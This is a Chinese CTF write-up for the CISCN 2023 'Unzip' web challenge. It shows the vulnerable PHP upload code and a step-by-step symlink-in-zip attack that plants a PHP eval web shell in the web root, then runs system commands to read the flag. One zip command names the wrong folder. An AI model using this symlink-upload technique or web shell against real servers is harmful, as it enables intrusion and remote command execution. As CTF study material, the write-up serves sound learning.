CISCN_2023--Web-Unzip
打开之后是一个上传框,随便上传一张图片,显示:
<?php
error_reporting(0);
highlight_file(__FILE__);
$finfo = finfo_open(FILEINFO_MIME_TYPE);
if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip'){
exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]);
};
//only this!
代码分析:
①
if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip')
验证MIME值,确定上传的文件类型为zip,说明要上传一个zip压缩文件
②
exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]);
把压缩包解压到/tmp目录下
解题思路:
在 Linux 系统中,如果使用 Apache 服务器,默认的 Web 根目录是/var/www/html。
上传解压后的文件被解压到/tmp目录下,并且不能直接访问到/tmp目录,但可以直接访问网站根目录/var/www/html。
想办法实现目录跳转,想到了软链接(和Windows的快捷方式类似):
①使/tmp目录下的link与网站根目录/var/www/html建立软链接
(了解软硬链接:Linux-33Linux文件系统命令-ln链接中符号链接和硬链接的应用场景哔哩哔哩bilibili)
②上传一句话木马,时期被解压到网站根目录下
③用蚁剑,菜刀或者参数访问查询flag
总结:
依次上传两个zip文件,第一个zip文件slink.zip解压之后建立软链接(此时slink相当于/var/www/html)
第二个zip文件包含一句话木马,且解压之后的名字和第一个zip文件解压之后的名字一样,因此把第一个zip文件解压之后覆盖
(第二个zip文件的结构:slink2.zip/slink/shell.php(shell.php里面是一句话木马),解压之后把原来解压得到的slink替换掉,shell.php相当于是在/var/www/html/shell.php)
操作:
1.打开kali,创建unzip文件夹,进入unzip文件夹创建软链接:
ln -s /var/www/html slink
此时slink就相当于/var/www/html
2.压缩:
zip --symlink slink.zip
ls显示:
slink slink.zip
3.删除slink,在unzip目录下创建slink目录
mkdir slink ls: slink slink.zip
4.进入slink创建shell.php文件,并写入后门代码
cd slink echo "<?php phpinfo();?>" >>shell.php ls: shell.php
5.在unzip目录压缩slink文件夹
zip -r slink2.zip ./slink2/* ls: slink2.zip slink.zip slink
6.上传
①
先上传slink.zip 再上传slink2.zip
访问/shell.php
显示的内容是php探针(phpinfo),说明操作正确
②
把一句话木马改成:
<?php eval($_POST['niubi']);?>
7.上传之后
法一:
蚁剑连接,成功找到flag
法二:
访问/shell.php
POST提交:niubi=system('ls /');
显示:
bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var
niubi=system('cat /flag');
成功得到flag
1832
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
